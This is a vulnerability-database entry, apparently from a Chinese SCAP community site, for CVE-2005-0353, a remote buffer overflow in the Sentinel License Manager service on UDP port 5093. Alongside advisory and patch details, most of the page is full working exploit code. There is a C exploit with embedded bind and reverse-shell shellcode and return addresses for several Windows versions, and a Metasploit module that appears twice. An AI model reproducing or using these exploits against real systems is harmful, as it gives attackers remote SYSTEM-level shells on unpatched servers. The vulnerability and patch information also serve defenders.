CVE-2005-0353
CVSS10.0
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:11:00
NMCOEPS    

[原文]Buffer overflow in the Sentinel LM (Lservnt) service in the Sentinel License Manager 7.2.0.2 allows remote attackers to execute arbitrary code by sending a large amount of data to UDP port 5093.


[CNNVD]Sentinel License Manager Lservnt服务远程缓冲区溢出漏洞(CNNVD-200505-490)

        Sentinel License Manager是一种远程执行软件许可管理的软件。
        Sentinel License Manager的Lservnt服务在处理请求时存在一个典型的缓冲区溢出漏洞,远程攻击者可以通过发送超长的请求溢出缓冲区在服务器上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0353
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0353
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-490
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111022094326772&w=2
(UNKNOWN)  BUGTRAQ  20050307 CIRT.DK Advisory - SafeNet Inc Sentinel License Manager 7.2.0.2 Buffer Overflow
http://marc.info/?l=full-disclosure&m=111072872816405&w=2
(UNKNOWN)  FULLDISC  20050313 [HAT-SQUAD] SafeNet Sentinel LM, UDP License Manager Exploit
http://www.cirt.dk/advisories/cirt-30-advisory.pdf
(VENDOR_ADVISORY)  MISC  http://www.cirt.dk/advisories/cirt-30-advisory.pdf
http://www.kb.cert.org/vuls/id/108790
(VENDOR_ADVISORY)  CERT-VN  VU#108790
http://www.securityfocus.com/bid/12742
(UNKNOWN)  BID  12742
http://xforce.iss.net/xforce/xfdb/19621
(UNKNOWN)  XF  sentinel-license-manager-bo(19621)

- 漏洞信息

Sentinel License Manager Lservnt服务远程缓冲区溢出漏洞
危急 缓冲区溢出
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        Sentinel License Manager是一种远程执行软件许可管理的软件。
        Sentinel License Manager的Lservnt服务在处理请求时存在一个典型的缓冲区溢出漏洞,远程攻击者可以通过发送超长的请求溢出缓冲区在服务器上执行任意指令。
        

- 公告与补丁

        目前厂商已经在8.0及以上版本的软件中修补了这个安全问题,请到厂商的主页下载:
        http://www.safenet-inc.com/products/sentinel/Sentinel_RMS.asp

- 漏洞信息 (875)

Sentinel LM 7.x UDP License Service Remote Buffer Overflow Exploit (EDBID:875)
windows remote
2005-03-13 Verified
5093 class101
N/A [点击下载]
/*
SentinelLM, UDP License Service Stack Overflow

Homepage:         safenet-inc.com
Affected version: 7.*
Patched  version: 8.0
Link:             safenet-inc.com/products/sentinel/lm.asp
Date:             09 March 2005
Advisory:         securitytracker.com/alerts/2005/Mar/1013385.html

Application Risk: High
Internet Risk:    Medium (UDP)

Dicovery Credits: Dennis Rand (CIRT.DK)
Exploit Credits : class101

Hole History:

		              07-3-2005: BOF flaw published by Dennis Rand of CIRT.DK
		              09-3-2005: hat-squad's exploit done
		              13-3-2005: hat-squad's exploit released

Notes:

    -the exploit targets 5093/UDP 
		-no bad chars detected
		-Unlike it is said in the CIRT.DK advisory, you shouldn't submit 3000bytes of data, but indeed, the overflow is occuring at around
		  3900 bytes. SentinelLM will proceed the first 1035bytes of your buffer and will repeat those until the override of the stack.
		  Conclusion , you have to be good with maths (nor to control our friend olly & calc :>) to overwrite the right place in your buffer[1035] 
		  to finally reach eip when your buffer "autogrows" at around buffer[3940].
		-sending the buffer twice because the 1st attempt can fail sometimes.
        -using a nice popopret outside of a loaded module for SP2and2k3 targets.
		  this offset has been tested on SP2 and 2003 ENGLISH (maybe langage-dependent dunno..)
		-to note so that target3 (SP2/2k3) can work sometimes as target2 (SP1a/1/0) but it is not stable this is why I use
		  one of the two I have posted at fulldisclosure (0x71ABE325/SP1a/1/0). This last is stable for the 3 sp (ENGLISH!).
	
Compilation:

                  101_SentLM.cpp ......... Win32 (MSVC,cygwin)
                  101_SentLM.c ........... Linux (FreeBSD,etc..)


	*Another fine working code, published as a patch warning or for an EXPERIMENTAL use!* 


Greet:

	         *GUILLERMITO* "the terrorist...sigh..:("


		              NIMA MAJIDI
		              BEHRANG FOULADI
		              PEJMAN
		              HAMID
		              HAT-SQUAD.COM
		              metasploit.com
		              A^C^E of addict3d.org
		              str0ke of milw0rm.com
		              and my homy CLASS101.ORG :>

*/

#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif

char scode1[]=
"\x33\xC9\x83\xE9"
"\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
"\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
"\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
"\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
"\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
"\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
"\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"
"\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
"\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
"\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
"\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
"\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
"\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
"\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
"\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02"
"\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";


char scode2[]=
/*original vlad902's reverse shellcode from metasploit.com
  NOT xored, modded by class101 for ca's xpl0it to remove the common badchar "\x20"
  original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
"\xFC\x6A\xEB\x52" /*modded adjusting jump*/
"\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B\x45\x3C\x8B\x7C\x05"
"\x78\x01\xEF"
"\x83\xC7\x01" /*modded, adding 1 to edi*/
"\x8B\x4F\x17" /*modded, adjusting ecx*/
"\x8B\x5F\x1F" /*modded, adjusting ebx, "\x20" out, yeahouu ;>*/
"\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84\xC0"
"\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
"\x8B\x5F\x23" /*modded, adjusting ebx*/
"\x01\xEB\x66\x8B\x0C\x4B"
"\x8B\x5F\x1B" /*modded, adjusting ebx*/
"\x01\xEB\x03\x2C\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40"
"\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E"
"\xEC\x50\xFF\xD6\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32"
"\x5F\x54\xFF\xD0\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66"
"\x81\xED\x08\x02\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF"
"\xD6\x53\x53\x53\x53\x43\x53\x43\x53\xFF\xD0\x68\x00\x00\x00\x00"
"\x66\x68\x00\x00\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF"
"\xD6\x6A\x10\x51\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50"
"\x59\x29\xCC\x89\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD"
"\xFE\x42\x2D\xFE\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3"
"\x16\xFF\x75\x28\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51"
"\x55\x51\xFF\xD0\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37"
"\xFF\xD0\x68\xE7\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF"
"\xD0\x68\xEF\xCE\xE0\x60\x53\xFF\xD6\xFF\xD0";

char payload[1100];
char sip[3];char spo[1];

char pad[]="\xEB\x08\x90\x90";
char pad2[]="\xE9\xC2\xFC\xFF\xFF";
char ebx2k[]="\x08\xB0\x01\x78";
char ebxp[]="\x25\xE3\xAB\x71";  /*popopret inside of a loaded module for SP0-1-1a*/
char ebxsp2k3[]="\xE1\x1B\xFA\x7F"; /*popopret outside of a loaded module for SP2 and 2003*/
/*some tests*/
char fix[]="\x76\x6C\x6D\x73";
char fix2[]="\x72\x76\x72\x2E";

#ifdef WIN32
	WSADATA wsadata;
#endif

void ver();
void usage(char* us);

int main(int argc,char *argv[])
{
	ver();
	int co, sw=0, check1, check2;
	unsigned long gip;
	unsigned short gport;
	char *target, *os;
	if (argc>6||argc<3||atoi(argv[1])>4||atoi(argv[1])<1){usage(argv[0]);return -1;}
	if (argc==5){usage(argv[0]);return -1;}
    if (strlen(argv[2])<7){usage(argv[0]);return -1;}
    if (argc==6)
	{
        if (strlen(argv[4])<7){usage(argv[0]);return -1;}
	}
#ifndef WIN32
	if (argc==6)
	{
 		gip=inet_addr(argv[4])^(long)0x00000000;
		gport=htons(atoi(argv[5]))^(short)0x0000;
		memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
		check1=strlen(&sip[0]);check2=strlen(&spo[0]);
		if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
			printf("[+] error, the IP has a null byte in hex...\n");return -1;}
		if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
	}
#define Sleep		sleep
#define SOCKET		int
#define closesocket(s) close(s)
#else
	if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
	if (argc==6)
	{
		gip=inet_addr(argv[4])^(ULONG)0x00000000;
		gport=htons(atoi(argv[5]))^(USHORT)0x0000;
		memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
		check1=strlen(&sip[0]);check2=strlen(&spo[0]);
		if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
			printf("[+] error, the IP has a null byte in hex...\n");return -1;}
		if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
	}
#endif
	int ip=htonl(inet_addr(argv[2])), port;
	if (argc==4||argc==6){port=atoi(argv[3]);} else port=5093;
	SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
	s=socket(AF_INET,SOCK_DGRAM,0);
	if (s==-1){printf("[+] socket() error\n");return -1;}	
	if (atoi(argv[1]) == 1){target=ebx2k;os="Win2k SP4 Server English\n[+]            Win2k SP4 Pro    English";}
	if (atoi(argv[1]) == 2){target=ebxp;os="WinXP SP0  Pro    English\n[+]            WinXP SP1  Pro    English\n[+]            WinXP SP1a Pro    English";}
	if (atoi(argv[1]) == 3){target=ebxsp2k3;os="WinXP SP2  Pro    English";}
	if (atoi(argv[1]) == 4){target=ebxsp2k3;os="Win2003 SP0 Server English";}
	server.sin_family=AF_INET;
	server.sin_addr.s_addr=htonl(ip);
	server.sin_port=htons(port);
	memset(payload,0x90,1100);
	if (atoi(argv[1]) == 4)
	{
		memcpy(payload+836,target,4);
		memcpy(payload+832,pad,4);
		memcpy(payload+845,pad2,5);
	}
	else
	{	
		memcpy(payload+840,target,4);
		memcpy(payload+836,pad,4);
		memcpy(payload+849,pad2,5);
	}
	memcpy(payload+12,fix,4);
	memcpy(payload+16,fix2,4);
	if (argc==6)
	{
		memcpy(&scode2[167], &gip, 4);
		memcpy(&scode2[173], &gport, 2);
		memcpy(payload+33,scode2,strlen(scode2));
	}
	else memcpy(payload+33,scode1,strlen(scode1));
	printf("[+] target(s): %s\n",os);
	printf("[+] sending datas to the udp port...\n");
	co = sendto(s,payload,sizeof(payload),0,(struct sockaddr *)&server,sizeof(server));
#ifdef WIN32
			Sleep(1000);
#else
			Sleep(1);
#endif
	co = sendto(s,payload,sizeof(payload),0,(struct sockaddr *)&server,sizeof(server));
#ifdef WIN32
			Sleep(1000);
#else
			Sleep(1);
#endif
	timeout.tv_sec=10;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
	sw = select((s+1),&mask,NULL,NULL,&timeout);
	if(sw)
	{
		printf("[+] sending error, the server prolly rebooted.\n");
		closesocket(s);
		return -1;
	}
	else
	{
		printf("[+] size of payload: %d\n",strlen(payload));			
		if (argc==6){printf("[+] payload sent, look at your listener, you should get a shell\n");}
		else printf("[+] payload sent, use telnet victimIP:101 to get a shell\n");
		closesocket(s);
		return 0;
	}
	return 0;
}


void usage(char* us) 
{  
  printf("                                                                                \n");
	printf("      [+]  . 101_SentLM.exe Target VulnIP (bind mode)                           \n");
	printf("      [+]  . 101_SentLM.exe Target VulnIP VulnPORT (bind mode)                  \n");
	printf("      [+]  . 101_SentLM.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode) \n");
	printf("TARGETS:                                                                        \n");
	printf("      [+] 1. Win2k  SP4  Server English (*) - v5.0.2195                         \n");
	printf("      [+] 1. Win2k  SP4  Pro    English (*) - v5.0.2195                         \n");
	printf("      [+] 2. WinXP  SP0  Pro.   English (*) - v5.1.2600                         \n");
	printf("      [+] 2. WinXP  SP1  Pro.   English (*) - v5.1.2600                         \n");
	printf("      [+] 2. WinXP  SP1a Pro.   English (*) - v5.1.2600                         \n");
	printf("      [+] 3. WinXP  SP2  Pro.   English (*) - v5.1.2600.2180                    \n");
	printf("      [+] 4. Win2k3 SP0  Server English (*) - v5.2.3790                         \n");
	printf("NOTE:                                                                           \n");
	printf("      The exploit bind a cmdshell port 101 or                                   \n");
	printf("      reverse a cmdshell on your listener.                                      \n");
	printf("      A wildcard (*) mean tested working, else, supposed working.               \n");
	printf("      A symbol   (-) mean all.                                                  \n");
	printf("      Compilation msvc6, cygwin, Linux.                                         \n");
	printf("                                                                                \n");
	return;
} 
void ver()
{	
	printf("                                                                     \n");
	printf("        ===================================================[v0.1]====\n");
	printf("        =====================SafeNet Sentinel LM=====================\n"); 
	printf("        ===============Remote Buffer Overflow Exploit================\n");
	printf("        ======coded by class101=============[Hat-Squad.com]==========\n");
	printf("        =====================================[class101.org]==========\n");
	printf("                                                                     \n");
}

// milw0rm.com [2005-03-13]
		

- 漏洞信息 (16746)

SentinelLM UDP Buffer Overflow (EDBID:16746)
windows remote
2010-05-09 Verified
5093 metasploit
N/A [点击下载]
##
# $Id: sentinel_lm7_udp.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SentinelLM UDP Buffer Overflow',
			'Description'    => %q{
					This module exploits a simple stack buffer overflow in the Sentinel
				License Manager. The SentinelLM service is installed with a
				wide selection of products and seems particular popular with
				academic products. If the wrong target value is selected,
				the service will crash and not restart.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2005-0353'],
					[ 'OSVDB', '14605'],
					[ 'BID', '12742'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['SentinelLM 7.2.0.0 Windows NT 4.0 SP4/SP5/SP6', { 'Ret' => 0x77681799 }], # ws2help.dll
					['SentinelLM 7.2.0.0 Windows 2000 English',       { 'Ret' => 0x75022ac4 }], # ws2help.dll
					['SentinelLM 7.2.0.0 Windows 2000 German',        { 'Ret' => 0x74fa1887 }], # ws2help.dll
					['SentinelLM 7.2.0.0 Windows XP English SP0/SP1', { 'Ret' => 0x71aa32ad }], # ws2help.dll
					['SentinelLM 7.2.0.0 Windows 2003 English SP0',   { 'Ret' => 0x7ffc0638 }], # peb
				],
			'DisclosureDate' => 'Mar 07 2005' ))

		register_options(
			[
				Opt::RPORT(5093)
			], self.class)
	end

	def check
		connect_udp
		udp_sock.put("\x7a\x00\x00\x00\x00\x00")
		res = udp_sock.recvfrom(8192)
		disconnect_udp

		if (res and res[0] == 0x7a)
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect_udp

		# Payload goes first
		buf = payload.encoded + rand_text_english(2048-payload.encoded.length)

		# Return to a pop/pop/ret via SEH
		buf[836, 4] = [target.ret].pack('V')

		# The pop/pop/ret takes us here, jump back 5 bytes
		buf[832, 2] = "\xeb\xf9"

		# Now jump all the way back to our shellcode
		buf[827, 5] = "\xe9" + [-829].pack('V')

		udp_sock.put(buf)
		udp_sock.recvfrom(8192)

		handler
		disconnect_udp
	end


end
		

- 漏洞信息 (F83234)

SentinelLM UDP Buffer Overflow (PacketStormID:F83234)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
CVE-2005-0353
[点击下载]

This Metasploit module exploits a simple stack overflow in the Sentinel License Manager. The SentinelLM service is installed with a wide selection of products and seems particular popular with academic products. If the wrong target value is selected, the service will crash and not restart.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'SentinelLM UDP Buffer Overflow',
			'Description'    => %q{
				This module exploits a simple stack overflow in the Sentinel
				License Manager. The SentinelLM service is installed with a
				wide selection of products and seems particular popular with
				academic products. If the wrong target value is selected,
				the service will crash and not restart.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-0353'],
					[ 'OSVDB', '14605'],
					[ 'BID', '12742'],

				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x20",
					'StackAdjustment' => -3500,

				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['SentinelLM 7.2.0.0 Windows NT 4.0 SP4/SP5/SP6', { 'Ret' => 0x77681799 }], # ws2help.dll
					['SentinelLM 7.2.0.0 Windows 2000 English',       { 'Ret' => 0x75022ac4 }], # ws2help.dll
					['SentinelLM 7.2.0.0 Windows 2000 German',        { 'Ret' => 0x74fa1887 }], # ws2help.dll
					['SentinelLM 7.2.0.0 Windows XP English SP0/SP1', { 'Ret' => 0x71aa32ad }], # ws2help.dll
					['SentinelLM 7.2.0.0 Windows 2003 English SP0',   { 'Ret' => 0x7ffc0638 }], # peb
				],
			'DisclosureDate' => 'Mar 07 2005' ))
			
			register_options(
				[
					Opt::RPORT(5093)
				], self.class)
	end
	
	def check
		connect_udp
		udp_sock.put("\x7a\x00\x00\x00\x00\x00")
		res = udp_sock.recvfrom(8192)
		disconnect_udp
		
		if (res and res[0] == 0x7a)
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect_udp
		
		# Payload goes first
		buf = payload.encoded + rand_text_english(2048-payload.encoded.length)
		
		# Return to a pop/pop/ret via SEH
		buf[836, 4] = [target.ret].pack('V')
		
		# The pop/pop/ret takes us here, jump back 5 bytes
		buf[832, 2] = "\xeb\xf9"
		
		# Now jump all the way back to our shellcode
		buf[827, 5] = "\xe9" + [-829].pack('V')
		
		udp_sock.put(buf)
		udp_sock.recvfrom(8192)
		
		handler
		disconnect_udp
	end


end
    

- 漏洞信息

14605
SafeNet Sentinel License Manager Lservnt Service Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in Sentinel License Manager. The Lservnt service fails to properly check the size of data sent to the server resulting in a buffer overflow. With a specially crafted request, an attacker can cause a buffer overflow resulting in a loss of confidentiality and integrity.

- 时间线

2005-03-07 2004-12-06
2005-03-13 Unknow

- 解决方案

Upgrade to version 8.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

SafeNet Sentinel License Manager Remote Buffer Overflow Vulnerability
Input Validation Error 12742
Yes No
2005-03-07 12:00:00 2009-07-12 10:56:00
Dennis Rand is credited with the discovery of this issue.

- 受影响的程序版本

SafeNet Sentinel License Manager 7.2 .0.2
SafeNet Sentinel License Manager 8.0

- 不受影响的程序版本

SafeNet Sentinel License Manager 8.0

- 漏洞讨论

A remote buffer overflow vulnerability affects SafeNet Sentinel License Manager. This issue is due to a failure of the application to securely copy network-derived data into finite process buffers.

An attacker may leverage this issue to execute arbitrary code with SYSTEM privileges.

- 漏洞利用

The following exploit has been released. It should be noted that 'sentinel_lm7_overflow.pm' is designed to work with the metasploit framework.

- 解决方案

SafeNet has released Sentinel License Manager version 8.0 dealing with this issue. Please contact the vendor for more information on obtaining the upgrade.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站